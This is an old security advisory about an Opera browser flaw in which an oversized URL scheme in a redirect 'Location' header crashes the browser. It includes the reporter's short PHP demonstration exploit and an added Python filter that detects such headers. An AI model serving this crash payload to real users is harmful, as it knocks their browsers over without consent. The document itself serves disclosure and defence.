Opera Browser 'Location' Header Flaw Lets Remote Users Crash the Browser
SecurityTracker Alert ID: 1007319
SecurityTracker URL: http://securitytracker.com/id/1007319
CVE Reference: GENERIC-MAP-NOMATCH
Date: Jul 28 2003
Impact: Denial of service via network
Exploit Included: Yes
Version(s): 6.12, 7.0

Description:
A denial of service vulnerability was reported in the Opera web browser in the processing of redirect URLs. A remote user can cause the target user's browser to crash.
dodo (https://www.darkwired.org/) reported that a remote user can send an HTTP response that includes a specially crafted 'Location' redirect header. When the HTTP response is loaded by the target user, the target user's browser will crash, according to the report.
A demonstration exploit PHP script is provided:
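<?php
// Build a 30000-character string to use as the URL scheme.
$prot = "";
for($i=0; 20000+10000>$i; $i++) $prot.="A";
// Send the redirect with the oversized scheme in the Location header.
header("Location: $prot://dd");
?>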

Impact:
A remote user can create an HTTP response that will crash the browser.

Solution:
No solution was available at the time of this entry.
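
As an added example (not part of the original advisory or the reporter's code), a filtering proxy or response-inspection rule could flag redirects like the one described above before they reach the browser. The function names and both length limits are assumptions chosen for illustration.

```python
import re

# RFC 3986 section 3.1: scheme = ALPHA *( ALPHA / DIGIT / "+" / "-" / "." )
SCHEME_RE = re.compile(r"^([A-Za-z][A-Za-z0-9+.\-]*):")
MAX_SCHEME_LEN = 32       # assumed policy limit, not a value from the advisory
MAX_LOCATION_LEN = 8192   # assumed policy limit for the whole header value

def location_values(raw_response: bytes):
    """Yield each Location header value from a raw HTTP response."""
    head = raw_response.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:            # skip the status line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"location":
            yield value.strip().decode("latin-1")

def check_location(value: str):
    """Return findings for one Location value; an empty list means clean."""
    findings = []
    if len(value) > MAX_LOCATION_LEN:
        findings.append("location-too-long")
    match = SCHEME_RE.match(value)
    if match:
        if len(match.group(1)) > MAX_SCHEME_LEN:
            findings.append("scheme-too-long")
    elif ":" in value.split("/", 1)[0]:
        # A colon before the first slash that is not a valid scheme.
        findings.append("scheme-malformed")
    return findings

def inspect_response(raw_response: bytes):
    """Collect findings for every Location header in the response."""
    return [f for v in location_values(raw_response) for f in check_location(v)]

# Constructed samples: a normal redirect, and one shaped like the advisory's
# demonstration (a 30000-character scheme followed by "://dd").
BENIGN = b"HTTP/1.1 302 Found\r\nLocation: https://example.com/a\r\n\r\n"
CRAFTED = (b"HTTP/1.1 302 Found\r\nLocation: " + b"A" * 30000 + b"://dd\r\n\r\n")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("crafted", CRAFTED)):
        print(label, inspect_response(sample) or "clean")
```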

Vendor URL: www.opera.com/
Cause: Not specified
Underlying OS: BeOS, Linux (Any), MacOS, QNX, UNIX (FreeBSD), UNIX (OS X), UNIX (Solaris - SunOS), Windows (Any)
Message History: None.